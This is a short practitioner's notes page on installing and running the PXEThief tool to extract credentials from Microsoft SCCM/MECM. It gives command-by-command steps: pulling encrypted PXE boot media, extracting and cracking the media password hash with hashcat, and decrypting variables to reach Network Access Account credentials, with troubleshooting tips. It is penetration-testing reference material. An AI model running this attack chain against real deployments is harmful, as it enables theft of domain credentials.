#
pxethief
pxethief helps you get creds out of SCCM.
INFO
Good news! I've got good success getting pxethief to run on Linux by following these steps. First, get the proper
git clone https://github.com/MWR-CyberSec/PXEThief.git
CD PXEThief
git fetch origin pull/11/head:pr-11
git checkout pr-11Then I found this works pretty well for getting it rocking in a venv:
python3 -m venv venv
source venv/bin/activate
sudo venv/bin/python3 -m pip install -r requirements.txt
sudo venv/bin/python3 pxethief.py
#
Install
Get python install from python.org - 64bit installer
pip install -r requirements.txtI'm having this issue.
#
General enumeration - automatically download encrypted media file using DHCP PXE
pxethief.py 1
#
Target a specific MECM DP
pxethief.py 2 1.2.3.4TIP
For automatic exploitation to happen, you need to have TFTP installed for Windows:
powershell Enable-WindowsOptionalFeature -FeatureName TFTP -Online
#
Identify hash of the password that was used to encrypt the variables
pxethief.py 5 boot.varNote: the boot.var is a file you might find in the \\SCCMSERVER\REMINST\SMSTEMP folder
#
Crack the extracted hash
I found it easier to use the hashcat-6.2.6-SCCM version of hashcat, and then use this syntax:
hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt
#
Decrypt and retrieve contents of the media variables file (if cracking was successful)
pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HEREAt this point you should be able to get a certificate that will be used to request SCCM policies and task sequences which may have the NAA or other creds.
TIP
I sometimes have a heck of a time getting this attack to work, but I opened a GitHub issue that helped me. I also had a situation where the decryption routine seemed to work and I got a funky UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 236-237: illegal encoding error. I opened an issue for this and the fix ended up being to comment/uncomment some lines following this guidance and then setting USING_TLS to False in the script:
USING_TLS = False #HTTPS and client certificate support